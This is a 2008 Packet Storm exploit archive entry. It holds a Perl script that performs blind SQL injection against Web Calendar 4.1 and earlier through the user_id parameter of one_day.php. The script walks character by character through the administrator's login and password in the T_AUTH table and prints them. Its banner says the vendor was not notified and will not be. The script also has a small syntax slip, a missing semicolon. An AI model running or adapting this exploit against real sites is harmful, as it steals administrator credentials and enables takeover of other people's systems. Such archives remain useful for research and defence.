webcal-sql.txt

2008-04-23T00:00:00
ID PACKETSTORM:65725
Type packetstorm
Reporter t0pp8uzz
Modified 2008-04-23T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
  
use strict;  
use LWP::Simple;  
  
print "-+--[ Web Calendar <= 4.1 Blind SQL Injection Exploit ]--+-\n";  
print "-+-- --+-\n";  
print "-+-- Discovered && Coded By t0pP8uZz --+-\n";  
print "-+-- Discovered On: 24 April 2008 --+-\n";  
print "-+-- --+-\n";  
print "-+-- Web Calendar suffers from a insecure mysql query --+-\n";  
print "-+-- the vendor has not been notified.. and wont be.. --+-\n";  
print "-+-- --+-\n";  
print "-+-- Exploit tested in ActivePerl --+-\n";  
print "-+-- --+-\n";  
print "-+--[ Web Calendar <= 4.1 Blind SQL Injection Exploit ]--+-\n";  
  
print "\nEnter URL (ie: http://site.com/webcal/): ";  
chomp(my $url=<STDIN>);  
  
print "\n\nInjecting Please Wait..\n\n"  
  
my $lop = 1;  
my $num = 48;  
my $sub = 1;  
my $res = undef;  
my $content = undef;  
  
while($lop) {  
  
$content = get($url."/one_day.php?user_id=1 AND ASCII(SUBSTRING((SELECT CONCAT(login,char(58),password,char(94)) FROM T_AUTH WHERE role_id=1 LIMIT 0,1),".$sub.",1))=".$num."/*");  
  
if($content !~ /you are not in database/i && $num == 94) { $lop = 0; }  
elsif($content !~ /you are not in database/i) { $res .= chr($num); $num = 48; $sub++; print $res."\n"; }  
else { $num++; }  
}  
  
print "\nExploit Successfull! Admin Details Are: ".$res;  
  
# Coded by t0pP8uZz  
  
`